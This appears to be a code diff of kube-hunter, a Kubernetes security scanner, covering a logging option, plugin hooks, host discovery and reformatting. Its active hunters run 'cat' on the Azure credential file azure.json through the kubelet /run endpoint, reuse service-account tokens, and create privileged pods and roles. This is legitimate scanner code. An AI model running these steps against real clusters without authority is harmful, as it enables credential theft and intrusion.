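To make the KHV052 exposure concrete, a minimal sketch of checking the /pods endpoint on the two ports named in the article (read-only 10255 over HTTP, secure 10250 over HTTPS). The target host is a placeholder; this is an assumed check in the spirit of kube-hunter's ExposedPodsHandler, not the hunter's actual code.

```python
# Illustrative sketch; placeholder host, default kubelet ports assumed.
import requests


def exposed_pods_endpoints(host, timeout=5):
    """Report which kubelet ports expose /pods to an unauthenticated caller."""
    results = {}
    for port, scheme in ((10255, "http"), (10250, "https")):
        url = f"{scheme}://{host}:{port}/pods"
        try:
            resp = requests.get(url, verify=False, timeout=timeout)
            # A 200 with a pod list means pod specs (env vars, mounts, images) leak anonymously.
            results[port] = resp.status_code == 200 and "items" in resp.json()
        except (requests.RequestException, ValueError):
            results[port] = False
    return results
```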
job.yaml (9 changes)
@@ -1,3 +1,4 @@
---
apiVersion: batch/v1
kind: Job
metadata:
@@ -6,9 +7,9 @@ spec:
  template:
    spec:
      containers:
        - name: kube-hunter
          image: aquasec/kube-hunter
          command: ["python", "kube-hunter.py"]
          args: ["--pod"]
        - name: kube-hunter
          image: aquasec/kube-hunter
          command: ["kube-hunter"]
          args: ["--pod"]
      restartPolicy: Never
  backoffLimit: 4
Binary file not shown. (Size before: 144 KiB, after: 230 KiB)

kube-hunter.png (BIN)
Binary file not shown. (Size before: 27 KiB, after: 19 KiB)
@@ -8,12 +8,17 @@ from kube_hunter.conf import Config, set_config
from kube_hunter.conf.parser import parse_args
from kube_hunter.conf.logging import setup_logger

args = parse_args()
from kube_hunter.plugins import initialize_plugin_manager

pm = initialize_plugin_manager()
# Using a plugin hook for adding arguments before parsing
args = parse_args(add_args_hook=pm.hook.parser_add_arguments)
config = Config(
    active=args.active,
    cidr=args.cidr,
    include_patched_versions=args.include_patched_versions,
    interface=args.interface,
    log_file=args.log_file,
    mapping=args.mapping,
    network_timeout=args.network_timeout,
    pod=args.pod,
@@ -21,9 +26,12 @@ config = Config(
    remote=args.remote,
    statistics=args.statistics,
)
setup_logger(args.log)
setup_logger(args.log, args.log_file)
set_config(config)

# Running all other registered plugins before execution
pm.hook.load_plugin(args=args)

from kube_hunter.core.events import handler
from kube_hunter.core.events.types import HuntFinished, HuntStarted
from kube_hunter.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent
@@ -65,13 +73,13 @@ def list_hunters():
    print("\nPassive Hunters:\n----------------")
    for hunter, docs in handler.passive_hunters.items():
        name, doc = hunter.parse_docs(docs)
        print("* {}\n {}\n".format(name, doc))
        print(f"* {name}\n {doc}\n")

    if config.active:
        print("\n\nActive Hunters:\n---------------")
        for hunter, docs in handler.active_hunters.items():
            name, doc = hunter.parse_docs(docs)
            print("* {}\n {}\n".format(name, doc))
            print(f"* {name}\n {doc}\n")


hunt_started_lock = threading.Lock()
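The hunk above routes argument registration through a plugin hook: parse_args now receives pm.hook.parser_add_arguments and calls it with the parser, and pm.hook.load_plugin runs once arguments are parsed. A hypothetical sketch of a third-party plugin using these hooks follows; it assumes the object returned by initialize_plugin_manager() is a regular pluggy PluginManager with a register method, which is not stated in the diff.

```python
# Hypothetical plugin module; the hook names come from the diff above, the rest is an assumption.
from kube_hunter.plugins import hookimpl, initialize_plugin_manager
from kube_hunter.conf.parser import parse_args


class ExamplePlugin:
    @hookimpl
    def parser_add_arguments(self, parser):
        # Called by parse_args() before parsing, alongside the default implementation.
        parser.add_argument("--example-flag", action="store_true", help="flag contributed by a plugin")

    @hookimpl
    def load_plugin(self, args):
        # Invoked via pm.hook.load_plugin(args=args) before hunting starts.
        if args.example_flag:
            print("example plugin enabled")


pm = initialize_plugin_manager()
pm.register(ExamplePlugin())  # assumption: standard pluggy registration
args = parse_args(add_args_hook=pm.hook.parser_add_arguments)
pm.hook.load_plugin(args=args)
```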
@@ -4,7 +4,7 @@ from typing import Any, Optional

@dataclass
class Config:
    """ Config is a configuration container.
    """Config is a configuration container.
    It contains the following fields:
    - active: Enable active hunters
    - cidr: Network subnets to scan
@@ -13,6 +13,7 @@ class Config:
    - interface: Interface scanning mode
    - list_hunters: Print a list of existing hunters
    - log_level: Log level
    - log_file: Log File path
    - mapping: Report only found components
    - network_timeout: Timeout for network operations
    - pod: From pod scanning mode
@@ -27,6 +28,7 @@ class Config:
    dispatcher: Optional[Any] = None
    include_patched_versions: bool = False
    interface: bool = False
    log_file: Optional[str] = None
    mapping: bool = False
    network_timeout: float = 5.0
    pod: bool = False
@@ -1,6 +1,5 @@
import logging


DEFAULT_LEVEL = logging.INFO
DEFAULT_LEVEL_NAME = logging.getLevelName(DEFAULT_LEVEL)
LOG_FORMAT = "%(asctime)s %(levelname)s %(name)s %(message)s"
@@ -10,7 +9,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.CRITICAL)
logging.getLogger("scapy.loading").setLevel(logging.CRITICAL)


def setup_logger(level_name):
def setup_logger(level_name, logfile):
    # Remove any existing handlers
    # Unnecessary in Python 3.8 since `logging.basicConfig` has `force` parameter
    for h in logging.getLogger().handlers[:]:
@@ -22,6 +21,9 @@ def setup_logger(level_name):
    else:
        log_level = getattr(logging, level_name.upper(), None)
        log_level = log_level if isinstance(log_level, int) else None
    logging.basicConfig(level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
    if logfile is None:
        logging.basicConfig(level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
    else:
        logging.basicConfig(filename=logfile, level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
    if not log_level:
        logging.warning(f"Unknown log level '{level_name}', using {DEFAULT_LEVEL_NAME}")
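In short, setup_logger now takes the value of the new --log-file flag and hands it to logging.basicConfig(filename=...). A brief usage sketch (the log-file path here is just an example):

```python
# Minimal usage sketch of the new signature wired up in kube-hunter.py above.
from kube_hunter.conf.logging import setup_logger

setup_logger("DEBUG", None)                    # unchanged behaviour: log to the console
setup_logger("INFO", "/tmp/kube-hunter.log")   # new: same format, written to the --log-file path
```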
@@ -1,11 +1,17 @@
|
||||
from argparse import ArgumentParser
|
||||
from kube_hunter.plugins import hookimpl
|
||||
|
||||
|
||||
def parse_args():
|
||||
parser = ArgumentParser(description="kube-hunter - hunt for security weaknesses in Kubernetes clusters")
|
||||
|
||||
@hookimpl
|
||||
def parser_add_arguments(parser):
|
||||
"""
|
||||
This is the default hook implementation for parse_add_argument
|
||||
Contains initialization for all default arguments
|
||||
"""
|
||||
parser.add_argument(
|
||||
"--list", action="store_true", help="Displays all tests in kubehunter (add --active flag to see active tests)",
|
||||
"--list",
|
||||
action="store_true",
|
||||
help="Displays all tests in kubehunter (add --active flag to see active tests)",
|
||||
)
|
||||
|
||||
parser.add_argument("--interface", action="store_true", help="Set hunting on all network interfaces")
|
||||
@@ -15,7 +21,9 @@ def parse_args():
|
||||
parser.add_argument("--quick", action="store_true", help="Prefer quick scan (subnet 24)")
|
||||
|
||||
parser.add_argument(
|
||||
"--include-patched-versions", action="store_true", help="Don't skip patched versions when scanning",
|
||||
"--include-patched-versions",
|
||||
action="store_true",
|
||||
help="Don't skip patched versions when scanning",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
@@ -25,11 +33,17 @@ def parse_args():
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--mapping", action="store_true", help="Outputs only a mapping of the cluster's nodes",
|
||||
"--mapping",
|
||||
action="store_true",
|
||||
help="Outputs only a mapping of the cluster's nodes",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--remote", nargs="+", metavar="HOST", default=list(), help="One or more remote ip/dns to hunt",
|
||||
"--remote",
|
||||
nargs="+",
|
||||
metavar="HOST",
|
||||
default=list(),
|
||||
help="One or more remote ip/dns to hunt",
|
||||
)
|
||||
|
||||
parser.add_argument("--active", action="store_true", help="Enables active hunting")
|
||||
@@ -43,7 +57,17 @@ def parse_args():
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--report", type=str, default="plain", help="Set report type, options are: plain, yaml, json",
|
||||
"--log-file",
|
||||
type=str,
|
||||
default=None,
|
||||
help="Path to a log file to output all logs to",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--report",
|
||||
type=str,
|
||||
default="plain",
|
||||
help="Set report type, options are: plain, yaml, json",
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
@@ -59,6 +83,18 @@ def parse_args():
|
||||
|
||||
parser.add_argument("--network-timeout", type=float, default=5.0, help="network operations timeout")
|
||||
|
||||
|
||||
def parse_args(add_args_hook):
|
||||
"""
|
||||
Function handles all argument parsing
|
||||
|
||||
@param add_arguments: hook for adding arguments to it's given ArgumentParser parameter
|
||||
@return: parsed arguments dict
|
||||
"""
|
||||
parser = ArgumentParser(description="kube-hunter - hunt for security weaknesses in Kubernetes clusters")
|
||||
# adding all arguments to the parser
|
||||
add_args_hook(parser=parser)
|
||||
|
||||
args = parser.parse_args()
|
||||
if args.cidr:
|
||||
args.cidr = args.cidr.replace(" ", "").split(",")
|
||||
|
||||
@@ -14,7 +14,7 @@ logger = logging.getLogger(__name__)
|
||||
# Inherits Queue object, handles events asynchronously
|
||||
class EventQueue(Queue):
|
||||
def __init__(self, num_worker=10):
|
||||
super(EventQueue, self).__init__()
|
||||
super().__init__()
|
||||
self.passive_hunters = dict()
|
||||
self.active_hunters = dict()
|
||||
self.all_hunters = dict()
|
||||
|
||||
@@ -144,7 +144,8 @@ class NewHostEvent(Event):
|
||||
logger.debug("Checking whether the cluster is deployed on azure's cloud")
|
||||
# Leverage 3rd tool https://github.com/blrchen/AzureSpeed for Azure cloud ip detection
|
||||
result = requests.get(
|
||||
f"https://api.azurespeed.com/api/region?ipOrUrl={self.host}", timeout=config.network_timeout,
|
||||
f"https://api.azurespeed.com/api/region?ipOrUrl={self.host}",
|
||||
timeout=config.network_timeout,
|
||||
).json()
|
||||
return result["cloud"] or "NoCloud"
|
||||
except requests.ConnectionError:
|
||||
@@ -194,7 +195,11 @@ class K8sVersionDisclosure(Vulnerability, Event):
|
||||
|
||||
def __init__(self, version, from_endpoint, extra_info=""):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, "K8s Version Disclosure", category=InformationDisclosure, vid="KHV002",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
"K8s Version Disclosure",
|
||||
category=InformationDisclosure,
|
||||
vid="KHV002",
|
||||
)
|
||||
self.version = version
|
||||
self.from_endpoint = from_endpoint
|
||||
|
||||
@@ -5,8 +5,7 @@ import requests
|
||||
|
||||
from enum import Enum
|
||||
from netaddr import IPNetwork, IPAddress, AddrFormatError
|
||||
from netifaces import AF_INET, ifaddresses, interfaces
|
||||
from scapy.all import ICMP, IP, Ether, srp1
|
||||
from netifaces import AF_INET, ifaddresses, interfaces, gateways
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.events import handler
|
||||
@@ -37,7 +36,7 @@ class RunningAsPodEvent(Event):
|
||||
try:
|
||||
with open(f"/var/run/secrets/kubernetes.io/serviceaccount/{file}") as f:
|
||||
return f.read()
|
||||
except IOError:
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
|
||||
@@ -46,10 +45,14 @@ class AzureMetadataApi(Vulnerability, Event):
|
||||
|
||||
def __init__(self, cidr):
|
||||
Vulnerability.__init__(
|
||||
self, Azure, "Azure Metadata Exposure", category=InformationDisclosure, vid="KHV003",
|
||||
self,
|
||||
Azure,
|
||||
"Azure Metadata Exposure",
|
||||
category=InformationDisclosure,
|
||||
vid="KHV003",
|
||||
)
|
||||
self.cidr = cidr
|
||||
self.evidence = "cidr: {}".format(cidr)
|
||||
self.evidence = f"cidr: {cidr}"
|
||||
|
||||
|
||||
class HostScanEvent(Event):
|
||||
@@ -105,7 +108,7 @@ class FromPodHostDiscovery(Discovery):
|
||||
if self.is_azure_pod():
|
||||
subnets, cloud = self.azure_metadata_discovery()
|
||||
else:
|
||||
subnets = self.traceroute_discovery()
|
||||
subnets = self.gateway_discovery()
|
||||
|
||||
should_scan_apiserver = False
|
||||
if self.event.kubeservicehost:
|
||||
@@ -137,12 +140,9 @@ class FromPodHostDiscovery(Discovery):
|
||||
return False
|
||||
|
||||
# for pod scanning
|
||||
def traceroute_discovery(self):
|
||||
config = get_config()
|
||||
node_internal_ip = srp1(
|
||||
Ether() / IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout,
|
||||
)[IP].src
|
||||
return [[node_internal_ip, "24"]]
|
||||
def gateway_discovery(self):
|
||||
""" Retrieving default gateway of pod, which is usually also a contact point with the host """
|
||||
return [[gateways()["default"][AF_INET][0], "24"]]
|
||||
|
||||
# querying azure's interface metadata api | works only from a pod
|
||||
def azure_metadata_discovery(self):
|
||||
|
||||
@@ -1,9 +1,10 @@
|
||||
import os
|
||||
import json
|
||||
import logging
|
||||
import requests
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.modules.hunting.kubelet import ExposedRunHandler
|
||||
from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler, SecureKubeletPortHunter
|
||||
from kube_hunter.core.events import handler
|
||||
from kube_hunter.core.events.types import Event, Vulnerability
|
||||
from kube_hunter.core.types import Hunter, ActiveHunter, IdentityTheft, Azure
|
||||
@@ -14,14 +15,19 @@ logger = logging.getLogger(__name__)
|
||||
class AzureSpnExposure(Vulnerability, Event):
|
||||
"""The SPN is exposed, potentially allowing an attacker to gain access to the Azure subscription"""
|
||||
|
||||
def __init__(self, container):
|
||||
def __init__(self, container, evidence=""):
|
||||
Vulnerability.__init__(
|
||||
self, Azure, "Azure SPN Exposure", category=IdentityTheft, vid="KHV004",
|
||||
self,
|
||||
Azure,
|
||||
"Azure SPN Exposure",
|
||||
category=IdentityTheft,
|
||||
vid="KHV004",
|
||||
)
|
||||
self.container = container
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
@handler.subscribe(ExposedRunHandler, predicate=lambda x: x.cloud == "Azure")
|
||||
@handler.subscribe(ExposedPodsHandler, predicate=lambda x: x.cloud_type == "Azure")
|
||||
class AzureSpnHunter(Hunter):
|
||||
"""AKS Hunting
|
||||
Hunting Azure cluster deployments using specific known configurations
|
||||
@@ -33,30 +39,33 @@ class AzureSpnHunter(Hunter):
|
||||
|
||||
# getting a container that has access to the azure.json file
|
||||
def get_key_container(self):
|
||||
config = get_config()
|
||||
endpoint = f"{self.base_url}/pods"
|
||||
logger.debug("Trying to find container with access to azure.json file")
|
||||
try:
|
||||
r = requests.get(endpoint, verify=False, timeout=config.network_timeout)
|
||||
except requests.Timeout:
|
||||
logger.debug("failed getting pod info")
|
||||
else:
|
||||
pods_data = r.json().get("items", [])
|
||||
for pod_data in pods_data:
|
||||
for container in pod_data["spec"]["containers"]:
|
||||
for mount in container["volumeMounts"]:
|
||||
path = mount["mountPath"]
|
||||
if "/etc/kubernetes/azure.json".startswith(path):
|
||||
return {
|
||||
"name": container["name"],
|
||||
"pod": pod_data["metadata"]["name"],
|
||||
"namespace": pod_data["metadata"]["namespace"],
|
||||
}
|
||||
|
||||
# pods are saved in the previous event object
|
||||
pods_data = self.event.pods
|
||||
|
||||
suspicious_volume_names = []
|
||||
for pod_data in pods_data:
|
||||
for volume in pod_data["spec"].get("volumes", []):
|
||||
if volume.get("hostPath"):
|
||||
path = volume["hostPath"]["path"]
|
||||
if "/etc/kubernetes/azure.json".startswith(path):
|
||||
suspicious_volume_names.append(volume["name"])
|
||||
for container in pod_data["spec"]["containers"]:
|
||||
for mount in container.get("volumeMounts", []):
|
||||
if mount["name"] in suspicious_volume_names:
|
||||
return {
|
||||
"name": container["name"],
|
||||
"pod": pod_data["metadata"]["name"],
|
||||
"namespace": pod_data["metadata"]["namespace"],
|
||||
"mount": mount,
|
||||
}
|
||||
|
||||
def execute(self):
|
||||
container = self.get_key_container()
|
||||
if container:
|
||||
self.publish_event(AzureSpnExposure(container=container))
|
||||
evidence = f"pod: {container['pod']}, namespace: {container['namespace']}"
|
||||
self.publish_event(AzureSpnExposure(container=container, evidence=evidence))
|
||||
|
||||
|
||||
@handler.subscribe(AzureSpnExposure)
|
||||
@@ -69,14 +78,42 @@ class ProveAzureSpnExposure(ActiveHunter):
|
||||
self.event = event
|
||||
self.base_url = f"https://{self.event.host}:{self.event.port}"
|
||||
|
||||
def test_run_capability(self):
|
||||
"""
|
||||
Uses SecureKubeletPortHunter to test the /run handler
|
||||
TODO: when multiple event subscription is implemented, use this here to make sure /run is accessible
|
||||
"""
|
||||
debug_handlers = SecureKubeletPortHunter.DebugHandlers(path=self.base_url, session=self.event.session, pod=None)
|
||||
return debug_handlers.test_run_container()
|
||||
|
||||
def run(self, command, container):
|
||||
config = get_config()
|
||||
run_url = "/".join(self.base_url, "run", container["namespace"], container["pod"], container["name"])
|
||||
return requests.post(run_url, verify=False, params={"cmd": command}, timeout=config.network_timeout)
|
||||
run_url = f"{self.base_url}/run/{container['namespace']}/{container['pod']}/{container['name']}"
|
||||
return self.event.session.post(run_url, verify=False, params={"cmd": command}, timeout=config.network_timeout)
|
||||
|
||||
def get_full_path_to_azure_file(self):
|
||||
"""
|
||||
Returns a full path to /etc/kubernetes/azure.json
|
||||
Taking into consideration the difference folder of the mount inside the container.
|
||||
TODO: implement the edge case where the mount is to parent /etc folder.
|
||||
"""
|
||||
azure_file_path = self.event.container["mount"]["mountPath"]
|
||||
|
||||
# taking care of cases where a subPath is added to map the specific file
|
||||
if not azure_file_path.endswith("azure.json"):
|
||||
azure_file_path = os.path.join(azure_file_path, "azure.json")
|
||||
|
||||
return azure_file_path
|
||||
|
||||
def execute(self):
|
||||
if not self.test_run_capability():
|
||||
logger.debug("Not proving AzureSpnExposure because /run debug handler is disabled")
|
||||
return
|
||||
|
||||
try:
|
||||
subscription = self.run("cat /etc/kubernetes/azure.json", container=self.event.container).json()
|
||||
azure_file_path = self.get_full_path_to_azure_file()
|
||||
logger.debug(f"trying to access the azure.json at the resolved path: {azure_file_path}")
|
||||
subscription = self.run(f"cat {azure_file_path}", container=self.event.container).json()
|
||||
except requests.Timeout:
|
||||
logger.debug("failed to run command in container", exc_info=True)
|
||||
except json.decoder.JSONDecodeError:
|
||||
|
||||
@@ -29,7 +29,11 @@ class ServerApiAccess(Vulnerability, Event):
|
||||
name = "Unauthenticated access to API"
|
||||
category = UnauthenticatedAccess
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name=name, category=category, vid="KHV005",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name=name,
|
||||
category=category,
|
||||
vid="KHV005",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -42,19 +46,30 @@ class ServerApiHTTPAccess(Vulnerability, Event):
|
||||
name = "Insecure (HTTP) access to API"
|
||||
category = UnauthenticatedAccess
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name=name, category=category, vid="KHV006",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name=name,
|
||||
category=category,
|
||||
vid="KHV006",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class ApiInfoDisclosure(Vulnerability, Event):
|
||||
"""Information Disclosure depending upon RBAC permissions and Kube-Cluster Setup"""
|
||||
|
||||
def __init__(self, evidence, using_token, name):
|
||||
category = InformationDisclosure
|
||||
if using_token:
|
||||
name += " using service account token"
|
||||
name += " using default service account token"
|
||||
else:
|
||||
name += " as anonymous user"
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name=name, category=InformationDisclosure, vid="KHV007",
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name=name,
|
||||
category=category,
|
||||
vid="KHV007",
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -89,12 +104,14 @@ class ListClusterRoles(ApiInfoDisclosure):
|
||||
|
||||
class CreateANamespace(Vulnerability, Event):
|
||||
|
||||
""" Creating a namespace might give an attacker an area with default (exploitable) permissions to run pods in.
|
||||
"""
|
||||
"""Creating a namespace might give an attacker an area with default (exploitable) permissions to run pods in."""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Created a namespace", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Created a namespace",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -105,14 +122,17 @@ class DeleteANamespace(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Delete a namespace", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Delete a namespace",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class CreateARole(Vulnerability, Event):
|
||||
""" Creating a role might give an attacker the option to harm the normal behavior of newly created pods
|
||||
within the specified namespaces.
|
||||
"""Creating a role might give an attacker the option to harm the normal behavior of newly created pods
|
||||
within the specified namespaces.
|
||||
"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
@@ -121,37 +141,46 @@ class CreateARole(Vulnerability, Event):
|
||||
|
||||
|
||||
class CreateAClusterRole(Vulnerability, Event):
|
||||
""" Creating a cluster role might give an attacker the option to harm the normal behavior of newly created pods
|
||||
across the whole cluster
|
||||
"""Creating a cluster role might give an attacker the option to harm the normal behavior of newly created pods
|
||||
across the whole cluster
|
||||
"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Created a cluster role", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Created a cluster role",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class PatchARole(Vulnerability, Event):
|
||||
""" Patching a role might give an attacker the option to create new pods with custom roles within the
|
||||
"""Patching a role might give an attacker the option to create new pods with custom roles within the
|
||||
specific role's namespace scope
|
||||
"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Patched a role", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Patched a role",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
|
||||
class PatchAClusterRole(Vulnerability, Event):
|
||||
""" Patching a cluster role might give an attacker the option to create new pods with custom roles within the whole
|
||||
"""Patching a cluster role might give an attacker the option to create new pods with custom roles within the whole
|
||||
cluster scope.
|
||||
"""
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Patched a cluster role", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Patched a cluster role",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -161,7 +190,10 @@ class DeleteARole(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Deleted a role", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Deleted a role",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -171,7 +203,10 @@ class DeleteAClusterRole(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Deleted a cluster role", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Deleted a cluster role",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -181,7 +216,10 @@ class CreateAPod(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Created A Pod", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Created A Pod",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -191,7 +229,10 @@ class CreateAPrivilegedPod(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
|
||||
Vulnerability.__init__(
|
||||
self, KubernetesCluster, name="Created A PRIVILEGED Pod", category=AccessRisk,
|
||||
self,
|
||||
KubernetesCluster,
|
||||
name="Created A PRIVILEGED Pod",
|
||||
category=AccessRisk,
|
||||
)
|
||||
self.evidence = evidence
|
||||
|
||||
@@ -201,7 +242,10 @@ class PatchAPod(Vulnerability, Event):
|
||||
|
||||
def __init__(self, evidence):
Vulnerability.__init__(
self, KubernetesCluster, name="Patched A Pod", category=AccessRisk,
self,
KubernetesCluster,
name="Patched A Pod",
category=AccessRisk,
)
self.evidence = evidence

@@ -211,7 +255,10 @@ class DeleteAPod(Vulnerability, Event):

def __init__(self, evidence):
Vulnerability.__init__(
self, KubernetesCluster, name="Deleted A Pod", category=AccessRisk,
self,
KubernetesCluster,
name="Deleted A Pod",
category=AccessRisk,
)
self.evidence = evidence

@@ -225,7 +272,7 @@ class ApiServerPassiveHunterFinished(Event):

# If we have a service account token we'll also trigger AccessApiServerWithToken below
@handler.subscribe(ApiServer)
class AccessApiServer(Hunter):
""" API Server Hunter
"""API Server Hunter
Checks if API server is accessible
"""

@@ -268,7 +315,10 @@ class AccessApiServer(Hunter):

try:
if not namespace:
r = requests.get(
f"{self.path}/api/v1/pods", headers=self.headers, verify=False, timeout=config.network_timeout,
f"{self.path}/api/v1/pods",
headers=self.headers,
verify=False,
timeout=config.network_timeout,
)
else:
r = requests.get(

@@ -296,7 +346,7 @@ class AccessApiServer(Hunter):

else:
self.publish_event(ServerApiAccess(api, self.with_token))

namespaces = self.get_items("{path}/api/v1/namespaces".format(path=self.path))
namespaces = self.get_items(f"{self.path}/api/v1/namespaces")
if namespaces:
self.publish_event(ListNamespaces(namespaces, self.with_token))

@@ -319,12 +369,12 @@ class AccessApiServer(Hunter):

@handler.subscribe(ApiServer, predicate=lambda x: x.auth_token)
class AccessApiServerWithToken(AccessApiServer):
""" API Server Hunter
"""API Server Hunter
Accessing the API server using the service account token obtained from a compromised pod
"""

def __init__(self, event):
super(AccessApiServerWithToken, self).__init__(event)
super().__init__(event)
assert self.event.auth_token
self.headers = {"Authorization": f"Bearer {self.event.auth_token}"}
self.category = InformationDisclosure

@@ -411,7 +461,8 @@ class AccessApiServerActive(ActiveHunter):

def patch_a_pod(self, namespace, pod_name):
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
return self.patch_item(
path=f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}", data=json.dumps(data),
path=f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}",
data=json.dumps(data),
)

def create_namespace(self):

@@ -438,7 +489,8 @@ class AccessApiServerActive(ActiveHunter):

"rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}],
}
return self.create_item(
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles", data=json.dumps(role),
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles",
data=json.dumps(role),
)

def create_a_cluster_role(self):

@@ -450,7 +502,8 @@ class AccessApiServerActive(ActiveHunter):

"rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}],
}
return self.create_item(
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles", data=json.dumps(cluster_role),
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles",
data=json.dumps(cluster_role),
)

def delete_a_role(self, namespace, name):

@@ -477,7 +530,8 @@ class AccessApiServerActive(ActiveHunter):

def patch_a_cluster_role(self, cluster_role):
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
return self.patch_item(
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles/{cluster_role}", data=json.dumps(data),
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles/{cluster_role}",
data=json.dumps(data),
)

def execute(self):
@@ -17,7 +17,11 @@ class PossibleArpSpoofing(Vulnerability, Event):

def __init__(self):
Vulnerability.__init__(
self, KubernetesCluster, "Possible Arp Spoof", category=IdentityTheft, vid="KHV020",
self,
KubernetesCluster,
"Possible Arp Spoof",
category=IdentityTheft,
vid="KHV020",
)

@@ -39,7 +43,7 @@ class ArpSpoofHunter(ActiveHunter):

def detect_l3_on_host(self, arp_responses):
""" returns True for an existence of an L3 network plugin """
logger.debug("Attempting to detect L3 network plugin using ARP")
unique_macs = list(set(response[ARP].hwsrc for _, response in arp_responses))
unique_macs = list({response[ARP].hwsrc for _, response in arp_responses})

# if LAN addresses not unique
if len(unique_macs) == 1:

@@ -55,7 +59,9 @@ class ArpSpoofHunter(ActiveHunter):

config = get_config()
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst
arp_responses, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"), timeout=config.network_timeout, verbose=0,
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"),
timeout=config.network_timeout,
verbose=0,
)

# arp enabled on cluster and more than one pod on node

@@ -17,7 +17,10 @@ class CapNetRawEnabled(Event, Vulnerability):

def __init__(self):
Vulnerability.__init__(
self, KubernetesCluster, name="CAP_NET_RAW Enabled", category=AccessRisk,
self,
KubernetesCluster,
name="CAP_NET_RAW Enabled",
category=AccessRisk,
)
@@ -8,18 +8,24 @@ from kube_hunter.core.events import handler

from kube_hunter.core.events.types import Vulnerability, Event, Service

logger = logging.getLogger(__name__)
email_pattern = re.compile(rb"([a-z0-9]+@[a-z0-9]+\.[a-z0-9]+)")
